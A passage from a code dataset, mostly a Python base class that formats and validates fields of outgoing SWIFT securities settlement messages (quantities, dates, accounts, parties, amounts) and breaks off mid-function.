status=status.HTTP_200_OK)\n\n\n\n\n\n","sub_path":"apps/group/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346071971","text":"\"\"\"----------------------------------------------------------------------------\nMODULE:\n FSecuritySettlementOutBase\n\nDESCRIPTION:\n This module provides the base class for the security settlement outgoing implementation.\n It contains the common mwthods across security settlement outgoing solution.\n\nCLASS:\n FSecuritySettlementOutBase\n\nVERSION: 3.0.0-0.5.3344\n\nRESTRICTIONS/LIMITATIONS:\n\t1. Any modifications to the script/encrypted module/clear text code within the core is not supported.\n\t2. This module is not customizable.\n\t3. The component may not work as expected with any modifications done to this module at user end.\n----------------------------------------------------------------------------\"\"\"\nfrom FMTOutBase import FMTOutBase\nimport FSwiftWriterUtils\nimport FSecuritySettlementOutUtils\nimport FSwiftWriterLogger\nimport FSwiftMLUtils\nimport acm\n\nnotifier = FSwiftWriterLogger.FSwiftWriterLogger('SecSetOut', 'FSecuritySettlementOutNotify_Config')\n\nclass FSecuritySettlementOutBase(FMTOutBase):\n def __init__(self, acm_obj, swift_obj, swift_metadata_xml_dom=None):\n super(FSecuritySettlementOutBase, self).__init__(acm_obj, swift_obj, swift_metadata_xml_dom)\n\n # ------------------ quantity of instrument-36B-----------------------\n\n def quantity_of_instrument_36B(self):\n '''\n Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v3,k2:v4}]\n '''\n if self.use_operations_xml:\n quantity_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'QUANTITY',\n ['QUANTITY_TYPE_CODE', 'QUANTITY_QUANTITY'])\n else:\n quantity = {}\n quantity_blocks = []\n quantity['QUANTITY_TYPE_CODE'] = FSecuritySettlementOutUtils.get_quantity_type_code()\n quantity['QUANTITY_QUANTITY'] = FSecuritySettlementOutUtils.get_quantity(self.acm_obj)\n quantity_blocks.append(quantity)\n return quantity_blocks\n\n def _format_quantity_of_instrument_36B(self, val):\n quantity_of_instrument = []\n for each_block in val:\n quantity_of_instrument.append(\":SETT//\" + str(each_block['QUANTITY_TYPE_CODE']) + \"/\" + str(\n each_block['QUANTITY_QUANTITY']).replace('.', ','))\n return quantity_of_instrument\n\n def _validate_quantity_of_instrument_36B(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n val = self._validate_quantity_of_instrument_36B_items(each_val)\n values.append(val)\n return values\n\n # ------------------ date time -98A-----------------------\n\n def get_settlement_datetime_98_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def date_time(self):\n '''\n Returns a list of dictionaries as [{'DateTime_A':{k1:v1,k2:v2}},{'DateTime_A':{k1:v3,k2:v4}}]\n '''\n val_list = []\n if self.use_operations_xml:\n settlement_datetime_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom,\n 'SETTLEMENT_DATETIME',\n ['SETTLEMENT_DATETIME_OPTION',\n 'SETTLEMENT_DATETIME_QUALIFIER',\n 'SETTLEMENT_DATETIME_DATE'])\n for each_block in settlement_datetime_blocks:\n val_dict = {}\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n else:\n val_dict = {}\n each_block = {}\n each_block['SETTLEMENT_DATETIME_OPTION'] = self.get_settlement_datetime_98_option()\n each_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_settlement_datetime_qualifier()\n each_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_settlement_datetime_date(self.acm_obj)\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n else:\n notifier.ERROR(\"%s Option %s is not supported for tag %s. Mapping default option: A\" %\n (self.swift_message_type, each_block['SETTLEMENT_DATETIME_OPTION'], 'SettlementDateTime_98a'))\n each_block['SETTLEMENT_DATETIME_OPTION'] = 'A'\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n\n val_dict = {}\n each_block = {}\n each_block['SETTLEMENT_DATETIME_OPTION'] = self.get_settlement_datetime_98_option()\n each_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_trade_datetime_qualifier()\n each_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_trade_datetime_date(self.acm_obj)\n if each_block['SETTLEMENT_DATETIME_OPTION'] == 'A':\n val_dict['DateTime_A'] = self.date_time_98A(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_date_time(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'DateTime_A' in each_val:\n format_dict['DateTime_A'] = self._format_date_time_98A(each_val['DateTime_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_date_time(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'DateTime_A' in each_val:\n val = self._validate_date_time_98A(each_val['DateTime_A'])\n if val:\n valid_dict['DateTime_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ date time 98A -----------------------\n def date_time_98A(self, sett_datetime_dict):\n '''\n Returns a dictionary as {key1:value1, key2:value2}\n '''\n values_dict = {}\n date = sett_datetime_dict['SETTLEMENT_DATETIME_DATE']\n qualifier = sett_datetime_dict['SETTLEMENT_DATETIME_QUALIFIER']\n values_dict['date'] = date\n values_dict['qualifier'] = qualifier\n return values_dict\n\n def _format_date_time_98A(self, val):\n date = val.get('date')\n qualifier = val.get('qualifier')\n date_format = '%Y%m%d'\n yyyymmdd_date = FSwiftWriterUtils.format_date(date, date_format)\n val = \":\" + str(qualifier) + '//' + str(yyyymmdd_date)\n return val\n\n # ------------------ account -----------------------\n\n def get_account_97_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def account(self):\n '''\n Returns a list of dictionaries as [{'Account_A':{k1:v1}},{'Account_A':{k1:v2}}]\n '''\n val_list = []\n if self.use_operations_xml:\n account_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'ACCOUNT',\n ['ACCOUNT_OPTION', 'ACCOUNT_QUALIFIER', 'ACCOUNT_NUMBER'])\n for each_block in account_blocks:\n val_dict = {}\n if each_block and each_block['ACCOUNT_OPTION'] == 'A':\n val_dict['Account_A'] = self.account_97A(each_block)\n val_list.append(val_dict)\n else:\n val_dict = {}\n each_block = {}\n each_block['ACCOUNT_OPTION'] = self.get_account_97_option()\n each_block['ACCOUNT_QUALIFIER'] = FSecuritySettlementOutUtils.get_account_qualifier()\n each_block['ACCOUNT_NUMBER'] = FSecuritySettlementOutUtils.get_account_number(self.acm_obj)\n if each_block and each_block['ACCOUNT_OPTION'] not in ['A']:\n notifier.ERROR(\"%s Option %s is not supported for tag %s. Mapping default option: A\" %\n (self.swift_message_type, each_block['ACCOUNT_OPTION'], 'Account_97a'))\n each_block['ACCOUNT_OPTION'] = 'A'\n if each_block and each_block['ACCOUNT_OPTION'] == 'A':\n val_dict['Account_A'] = self.account_97A(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_account(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'Account_A' in each_val:\n format_dict['Account_A'] = self._format_account_97A(each_val['Account_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_account(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'Account_A' in each_val:\n val = self._validate_account_97A(each_val['Account_A'])\n if val:\n valid_dict['Account_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ account - 97A -----------------------\n def account_97A(self, account_dict):\n '''\n Returns a dictionary as {k1:v1, k2:v2}\n '''\n values_dict = {}\n qualifier = account_dict['ACCOUNT_QUALIFIER']\n number = account_dict['ACCOUNT_NUMBER']\n values_dict['qualifier'] = qualifier\n values_dict['number'] = number\n return values_dict\n\n def _format_account_97A(self, val):\n qualifier = val.get('qualifier')\n number = val.get('number')\n account_A = \":\" + str(qualifier) + \"//\" + str(number)\n return account_A\n\n # ------------------ function of message - 23G -----------------------\n\n def function_of_message_23G(self):\n '''\n Returns a string containing value of fuction_of_message\n '''\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n return function_of_message\n\n def _format_function_of_message_23G(self, val):\n return val\n\n # ------------------ place of safekeeping - 94F-----------------------\n\n def place_of_safekeeping(self):\n '''\n Returns a list of dictionaries as [{PlaceOfSafekeeping_F:{k1:v1,k2:v2}},{PlaceOfSafekeeping_F:{k1:v3,k2:v4}}]\n '''\n val_list = []\n if self.use_operations_xml:\n place_of_safekeeping_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom,\n 'PLACE_OF_SAFEKEEPING',\n ['PLACE_OF_SAFEKEEPING_OPTION',\n 'PLACE_OF_SAFEKEEPING_QUALIFIER',\n 'PLACE_OF_SAFEKEEPING_PLACE_CODE',\n 'PLACE_OF_SAFEKEEPING_IDENTIFIER_CODE'],\n ignore_absense=True)\n for each_block in place_of_safekeeping_blocks:\n val_dict = {}\n if each_block and each_block['PLACE_OF_SAFEKEEPING_OPTION'] == 'F':\n val_dict['PlaceOfSafekeeping_F'] = self.place_of_safekeeping_94F(each_block)\n val_list.append(val_dict)\n return val_list\n\n def _format_place_of_safekeeping(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'PlaceOfSafekeeping_F' in each_val:\n format_dict['PlaceOfSafekeeping_F'] = self._format_place_of_safekeeping_94F(\n each_val['PlaceOfSafekeeping_F'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_place_of_safekeeping(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'PlaceOfSafekeeping_F' in each_val:\n val = self._validate_place_of_safekeeping_94F(each_val['PlaceOfSafekeeping_F'])\n if val:\n valid_dict['PlaceOfSafekeeping_F'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ place of safekeeping 94F -----------------------\n def place_of_safekeeping_94F(self, place_of_safekeeping_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_QUALIFIER']\n place_code = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_PLACE_CODE']\n identifier = place_of_safekeeping_dict['PLACE_OF_SAFEKEEPING_IDENTIFIER_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['place_code'] = place_code\n values_dict['identifier'] = identifier\n return values_dict\n\n def _format_place_of_safekeeping_94F(self, val):\n qualifier = val.get('qualifier')\n place_code = val.get('place_code')\n identifier = val.get('identifier')\n place_of_safekeeping_F = str(qualifier) + \"//\" + \\\n str(place_code) + \"/\" + \\\n str(identifier)\n return place_of_safekeeping_F\n\n # ------------------ settlement parties -----------------------\n\n def get_party_95_option(self):\n \"\"\"Returns option override if implemented\n :return: str; option choice as string\n \"\"\"\n return 'P'\n\n def get_party_safekeeping_97_option(self):\n \"\"\"Returns default option if override is not provided\n :return: str; option choice as string\n \"\"\"\n return 'A'\n\n def _format_settlement_parties(self, val):\n format_list = []\n for each_val in val:\n format_dict = {}\n if 'PARTY_P' in each_val:\n format_dict['PARTY_P'] = self._format_settlement_party_95P(each_val['PARTY_P'])\n if 'PARTY_C' in each_val:\n format_dict['PARTY_C'] = self._format_settlement_party_95C(each_val['PARTY_C'])\n if 'PARTY_Q' in each_val:\n format_dict['PARTY_Q'] = self._format_settlement_party_95Q(each_val['PARTY_Q'])\n if 'PARTY_R' in each_val:\n format_dict['PARTY_R'] = self._format_settlement_party_95R(each_val['PARTY_R'])\n if 'SafekeepingAccount_A' in each_val:\n format_dict['SafekeepingAccount_A'] = self._format_party_safekeeping_account_97A(\n each_val['SafekeepingAccount_A'])\n format_list.append(format_dict)\n return format_list\n\n def _validate_settlement_parties(self, val_list):\n err_msg = ''\n valid_list = []\n for each_val in val_list:\n valid_dict = {}\n if 'PARTY_P' in each_val:\n val = self._validate_settlement_party_95P(each_val['PARTY_P'])\n if val:\n valid_dict['PARTY_P'] = val\n if 'PARTY_C' in each_val:\n val = self._validate_settlement_party_95C(each_val['PARTY_C'])\n if val:\n valid_dict['PARTY_C'] = val\n if 'PARTY_Q' in each_val:\n val = self._validate_settlement_party_95Q(each_val['PARTY_Q'])\n if val:\n valid_dict['PARTY_Q'] = val\n if 'PARTY_R' in each_val:\n val = self._validate_settlement_party_95R(each_val['PARTY_R'])\n if val:\n valid_dict['PARTY_R'] = val\n if 'SafekeepingAccount_A' in each_val:\n val = self._validate_party_safekeeping_account_97A(each_val['SafekeepingAccount_A'])\n if val:\n valid_dict['SafekeepingAccount_A'] = val\n valid_list.append(valid_dict)\n return valid_list\n\n # ------------------ settlement parties 95P -----------------------\n def settlement_party_95P(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n code = party_dict['PARTY_IDENTIFIER_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95P(self, val):\n qualifier = val.get('qualifier')\n code = val.get('code')\n if not code: # SPR 405530 in Prime, Prime > 2017.3 returns PARTY_IDENTIFIER_CODE in XML but < 2017.3 returns empty\n counter_party_account = self.acm_obj.CounterpartyAccountRef()\n if counter_party_account:\n code = FSwiftMLUtils.get_party_bic(counter_party_account)\n settlement_party_P = \":\" + str(qualifier) + \"//\" + str(code)\n return settlement_party_P\n\n # ------------------ settlement parties 95R -----------------------\n def settlement_party_95R(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n source_scheme = party_dict['PARTY_DATA_SOURCE_SCHEME']\n code = party_dict['PARTY_PROPRIETARY_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['source_scheme'] = source_scheme\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95R(self, val):\n qualifier = val.get('qualifier')\n source_scheme = val.get('source_scheme')\n code = val.get('code')\n settlement_party_R = \":\" + str(qualifier) + \"/\" + str(source_scheme) + \"/\" + str(code)\n return settlement_party_R\n\n # ------------------ settlement parties 95C -----------------------\n def settlement_party_95C(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n code = party_dict['PARTY_COUNTRY_CODE']\n values_dict['qualifier'] = qualifier\n values_dict['code'] = code\n return values_dict\n\n def _format_settlement_party_95C(self, val):\n qualifier = val.get('qualifier')\n code = val.get('code')\n settlement_party_C = \":\" + str(qualifier) + \"//\" + str(code)\n return settlement_party_C\n\n # ------------------ settlement parties 95Q -----------------------\n def settlement_party_95Q(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_QUALIFIER']\n name = party_dict['PARTY_NAME']\n address = party_dict['PARTY_ADDRESS']\n values_dict['qualifier'] = qualifier\n values_dict['name'] = name\n values_dict['address'] = address\n return values_dict\n\n def _format_settlement_party_95Q(self, val):\n qualifier = val.get('qualifier')\n name = val.get('name')\n address = val.get('address')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n settlement_party_Q = \":\" + str(qualifier) + \"//\" + val\n return settlement_party_Q\n\n # ------------------ party safekeeping account 97A -----------------------\n def party_safekeeping_account_97A(self, party_dict):\n '''\n Returns a dictionary as {k1:v1,k2:v2}\n '''\n values_dict = {}\n qualifier = party_dict['PARTY_SAFEKEEPING_QUALIFIER']\n account = party_dict['PARTY_SAFEKEEPING_ACCOUNT']\n values_dict['qualifier'] = qualifier\n values_dict['account'] = account\n return values_dict\n\n def _format_party_safekeeping_account_97A(self, val):\n qualifier = val.get('qualifier')\n account = val.get('account')\n party_safekeeping_account_A = \":\" + str(qualifier) + \"//\" + str(account)\n return party_safekeeping_account_A\n\n # ------------------ indicator-22F -----------------------\n\n def indicator_22F(self):\n '''\n Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v3,k2:v4}]\n '''\n if self.use_operations_xml:\n indicator_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'INDICATOR',\n ['INDICATOR_QUALIFIER', 'INDICATOR_INDICATOR'])\n else:\n indicator_blocks = []\n indicators = FSecuritySettlementOutUtils.get_indicators(self.acm_obj)\n for indicator_pair in indicators:\n indicator_block = {}\n indicator_block['INDICATOR_QUALIFIER'] = FSecuritySettlementOutUtils.get_qualifier(indicator_pair)\n indicator_block['INDICATOR_INDICATOR'] = FSecuritySettlementOutUtils.get_indicator(indicator_pair)\n indicator_blocks.append(indicator_block)\n return indicator_blocks\n\n def _format_indicator_22F(self, val):\n indicator_values = []\n for each_block in val:\n indicator_values.append(\n \":\" + str(each_block['INDICATOR_QUALIFIER']) + \"//\" + str(each_block[\"INDICATOR_INDICATOR\"]))\n return indicator_values\n\n def _validate_indicator_22F(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n val = self._validate_indicator_22F_items(each_val)\n values.append(val)\n return values\n\n # ------------------ identification of financial instruments-35B-----------------------\n\n def identification_of_financial_ins_35B(self):\n '''\n Returns a dictionary as {key1:value1, key2:value2}\n '''\n values_dict = {}\n if self.use_operations_xml:\n isin = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'INSTRUMENT_ISIN'])\n description_of_security = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'DESCRIPTION_OF_SECURITY'],\n ignore_absense=True)\n values_dict['isin'] = isin\n values_dict['description_of_security'] = description_of_security\n else:\n values_dict['isin'] = FSecuritySettlementOutUtils.get_instrument_ISIN(self.acm_obj)\n values_dict['description_of_security'] = FSecuritySettlementOutUtils.get_description_of_security(self.acm_obj)\n return values_dict\n\n def _format_identification_of_financial_ins_35B(self, val):\n isin = val.get('isin')\n description_of_security = val.get('description_of_security')\n if description_of_security:\n lines = FSwiftWriterUtils.split_text_on_character_limit(description_of_security, 35)\n description_of_security = FSwiftWriterUtils.allocate_space_for_n_lines(4, lines)\n identification_of_financial_ins = str(isin) + \"\\n\" + str(description_of_security)\n else:\n identification_of_financial_ins = str(isin) + \"\\n\"\n return str(identification_of_financial_ins)\n\n # ------------------ linkage details -----------------------\n\n def linkages_20C_16R(self):\n '''\n Returns a dictionary as {key:value, key1:value1}\n '''\n values_dict = {}\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n linkage_qualifier = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'LINKAGE', 'LINKAGE_QUALIFIER'],\n ignore_absense=True)\n linkage_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'LINKAGE', 'LINKAGE_REFERENCE'],\n ignore_absense=True)\n senders_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SETTLEMENT', 'SEQNBR'])\n seq_ref = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'SEQREF'])\n\n values_dict['function_of_message'] = function_of_message\n values_dict['linkage_qualifier'] = linkage_qualifier\n values_dict['linkage_reference'] = linkage_reference\n values_dict['senders_reference'] = senders_reference\n values_dict['seq_ref'] = seq_ref\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n linkage_qualifier = FSecuritySettlementOutUtils.get_linkage_qualifier(self.acm_obj)\n linkage_reference = FSecuritySettlementOutUtils.get_linkage_reference(self.acm_obj)\n values_dict['function_of_message'] = function_of_message\n values_dict['linkage_qualifier'] = linkage_qualifier\n values_dict['linkage_reference'] = linkage_reference\n values_dict['senders_reference'] = self.acm_obj.Oid()\n values_dict['seq_ref'] = FSecuritySettlementOutUtils.get_settlement_reference_prefix()\n return values_dict\n\n def _check_condition_set_linkages_20C_16R(self):\n if self.use_operations_xml:\n function_of_message = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SWIFT', 'FUNCTION_OF_MESSAGE'])\n else:\n function_of_message = FSecuritySettlementOutUtils.get_function_of_message(self.acm_obj)\n if function_of_message == \"CANC\":\n return True\n return False\n\n # ------------------- senders reference - 20C-------------------\n\n def senders_message_reference_20C(self):\n '''\n Returns a dictionary as {'senders_reference':value1, 'seq_ref':value2}\n '''\n values_dict = {}\n if self.use_operations_xml:\n senders_reference = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom,\n ['SETTLEMENT', 'SEQNBR'])\n seq_ref = FSwiftWriterUtils.get_value_from_xml_tag(self.swift_metadata_xml_dom, ['SWIFT', 'SEQREF'])\n values_dict['senders_reference'] = senders_reference\n values_dict['seq_ref'] = seq_ref\n else:\n values_dict = {}\n values_dict['senders_reference'] = self.acm_obj.Oid()\n values_dict['seq_ref'] = FSecuritySettlementOutUtils.get_settlement_reference_prefix()\n return values_dict\n\n def _format_senders_message_reference_20C(self, val):\n senders_reference = val.get('senders_reference')\n seq_ref = val.get('seq_ref')\n sett_obj = acm.FSettlement[str(senders_reference)]\n if senders_reference:\n val = \":SEME//%s-%s-%s\" % (\n str(seq_ref), str(senders_reference), str(FSecuritySettlementOutUtils.get_message_version_number(sett_obj)))\n return str(val)\n\n # ------------------ amounts block -----------------------\n\n # block getter\n def amounts(self):\n \"\"\" Returns a dictionary as [{'AMOUNT_BLOCKS': [list_of _dict_of amounts], 'FLAG_BLOCKS': [list_of_dict_of_flags]}]\n \"\"\"\n amounts_block_details = dict()\n amounts_block_details['AMOUNT_BLOCKS'] = self.amount_19A()\n amounts_block_details['FLAG_BLOCKS'] = self.flag_17B()\n\n return amounts_block_details\n\n def _format_amounts(self, val_dict):\n \"\"\"Format amounts block\"\"\"\n amounts_block = dict()\n\n amounts_block['AMOUNT_BLOCKS'] = self._format_amounts_19A(val_dict.get('AMOUNT_BLOCKS'))\n amounts_block['FLAG_BLOCKS'] = self._format_flag_17B(val_dict.get('FLAG_BLOCKS'))\n return amounts_block\n\n def _validate_amounts(self, val_dict):\n \"\"\" Validate amount block fields\"\"\"\n val_dict['AMOUNT_BLOCKS'] = self._validate_amount_list_19A(val_dict.get('AMOUNT_BLOCKS'))\n val_dict['FLAG_BLOCKS'] = self._validate_flag_list_17B(val_dict.get('FLAG_BLOCKS'))\n return val_dict\n\n\n def amount_19A(self):\n \"\"\"Returns a list of dictionaries as [{k1:v1,k2:v2},{k1:v1,k2:v2}]\"\"\"\n if self.use_operations_xml:\n amount_blocks = FSwiftWriterUtils.get_block_xml_tags(self.swift_metadata_xml_dom, 'AMOUNT',\n ['AMOUNT_QUALIFIER', 'AMOUNT_SIGN',\n 'AMOUNT_CURRENCY_CODE',\n 'AMOUNT_AMOUNT'])\n else:\n amount_blocks = FSecuritySettlementOutUtils.get_amount_details(self.acm_obj, self.swift_message_type)\n\n return amount_blocks\n\n def flag_17B(self):\n \"\"\"get the settlement amount flag\"\"\"\n flag_blocks = FSecuritySettlementOutUtils.get_amount_flags(self.acm_obj, self.swift_message_type)\n return flag_blocks\n\n def _format_amounts_19A(self, val):\n amount_fields = list()\n for each_block in val:\n amount_field = \":\" + str(each_block['AMOUNT_QUALIFIER']) + \"//\" + str(each_block[\"AMOUNT_CURRENCY_CODE\"])\\\n + str(each_block[\"AMOUNT_AMOUNT\"]).replace('.', ',')\n\n amount_fields.append(amount_field)\n return amount_fields\n\n def _format_flag_17B(self, val):\n flag_fields = list()\n for each_block in val:\n flag_field = \":\" + str(each_block[\"QUALIFIER\"]) + \"//\" + str(each_block[\"FLAG\"])\n flag_fields.append(flag_field)\n return flag_fields\n\n\n def _validate_amount_list_19A(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n self._validate_amounts_19A(each_val)\n values.append(each_val)\n return values\n\n def _validate_flag_list_17B(self, val_list):\n err_msgs = []\n values = []\n for each_val in val_list:\n self._validate_flag_17B(each_val)\n values.append(each_val)\n return values\n\n\n # ------------------ SubSequence B1 date time - 98A -----------------------\n\n def subsequenceb1_date_time(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and Date\"\"\"\n date_time_list = []\n date_time_dict = {}\n date_time_block = {}\n date_time_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_maturity_datetime_qualifier()\n date_time_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_maturity_datetime_date(self.acm_obj)\n date_time_dict['DateTime'] = self.subsequenceb1_date_time_98A(date_time_block)\n date_time_list.append(date_time_dict)\n\n date_time_dict = {}\n date_time_block = {}\n date_time_block['SETTLEMENT_DATETIME_QUALIFIER'] = FSecuritySettlementOutUtils.get_issue_datetime_qualifier()\n date_time_block['SETTLEMENT_DATETIME_DATE'] = FSecuritySettlementOutUtils.get_issue_datetime_date(self.acm_obj)\n date_time_dict['DateTime'] = self.subsequenceb1_date_time_98A(date_time_block)\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _format_subsequenceb1_date_time(self, date_time_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n date_time_list = []\n for each_val in date_time_values:\n date_time_dict = {}\n if 'DateTime' in each_val:\n date_time_dict['DateTime'] = self._format_subsequenceb1_date_time_98A(each_val['DateTime'])\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _validate_subsequenceb1_date_time(self, date_time_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n date_time_list = []\n for each_val in date_time_values:\n date_time_dict = {}\n if 'DateTime' in each_val:\n val = self._validate_subsequenceb1_date_time_98A(each_val['DateTime'])\n if val:\n date_time_dict['DateTime'] = val\n date_time_list.append(date_time_dict)\n return date_time_list\n\n def _check_condition_set_subsequenceb1_date_time(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_subsequenceb1_date_time(self, date_time_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in date_time_values:\n if 'DateTime' in each_val:\n self._setsubsequenceb1date_time_98A(each_val['DateTime'])\n\n def subsequenceb1_date_time_98A(self, sett_datetime_dict):\n \"\"\"Returns a dictionary with values of Qualifier and Date\"\"\"\n date_time_dict = {}\n date = sett_datetime_dict['SETTLEMENT_DATETIME_DATE']\n qualifier = sett_datetime_dict['SETTLEMENT_DATETIME_QUALIFIER']\n date_time_dict['date'] = date\n date_time_dict['qualifier'] = qualifier\n return date_time_dict\n\n def _format_subsequenceb1_date_time_98A(self, date_time_values):\n \"\"\"returns formatted values of provided input\"\"\"\n date = date_time_values.get('date')\n qualifier = date_time_values.get('qualifier')\n date_format = '%Y%m%d'\n yyyymmdd_date = FSwiftWriterUtils.format_date(date, date_format)\n date_time = \":\" + str(qualifier) + '//' + str(yyyymmdd_date)\n return date_time\n\n def _setsubsequenceb1date_time_98A(self, date_time_values):\n \"\"\"sets the provided tag and value in python object\"\"\"\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Date.append(date_time_values)\n self.swift_obj.SequenceB_TradeDetails.SubSequenceB1_FinancialInstrumentAttributes.Date[-1].swiftTag = \"98A\"\n\n # ------------------ SubSequence B1 rate - 92A -----------------------\n\n def subsequenceb1_rate(self):\n \"\"\"returns a list containing the dictionary of values of Qualifier and rate\"\"\"\n rate_list = []\n rate_dict = {}\n rate_block = {}\n rate_block['SETTLEMENT_RATE_QUALIFIER'] = FSecuritySettlementOutUtils.get_rate_qualifier()\n rate_block['SETTLEMENT_RATE'] = FSecuritySettlementOutUtils.get_rate(self.acm_obj)\n rate_dict['Rate'] = self.subsequenceb1_rate_92A(rate_block)\n rate_list.append(rate_dict)\n return rate_list\n\n def _format_subsequenceb1_rate(self, rate_values):\n \"\"\"returns list of formatted values of provided input\"\"\"\n rate_list = []\n for each_val in rate_values:\n rate_dict = {}\n if 'Rate' in each_val:\n rate_dict['Rate'] = self._format_subsequenceb1_rate_92A(each_val['Rate'])\n rate_list.append(rate_dict)\n return rate_list\n\n def _validate_subsequenceb1_rate(self, rate_values):\n \"\"\"returns list of validated values\"\"\"\n err_msg = ''\n rate_list = []\n for each_val in rate_values:\n rate_dict = {}\n if 'Rate' in each_val:\n val = self._validate_subsequenceb1_rate_92A(each_val['Rate'])\n if val:\n rate_dict['Rate'] = val\n rate_list.append(rate_dict)\n return rate_list\n\n def _check_condition_set_subsequenceb1_rate(self):\n \"\"\"return True or False depending on the condition provided\"\"\"\n return False\n\n def _set_subsequenceb1_rate(self, rate_values):\n \"\"\"calls actual setter APIs depending on the provided input\"\"\"\n for each_val in rate_values:\n if 'Rate' in each_val:\n self._setsubsequenceb1rate_92A(each_val['Rate'])\n\n def subsequenceb1_rate_92A(self, sett_rate_dict):\n \"\"\"Returns a dictionary with values of Qualifier and rate\"\"\"\n rate_dict = {}\n rate = sett_rate_dict['SETTLEMENT_RATE']\n qualifier = sett_rate_dict['SETTLEMENT_RATE_QUALIFIER']\n rate_dict['rate'] 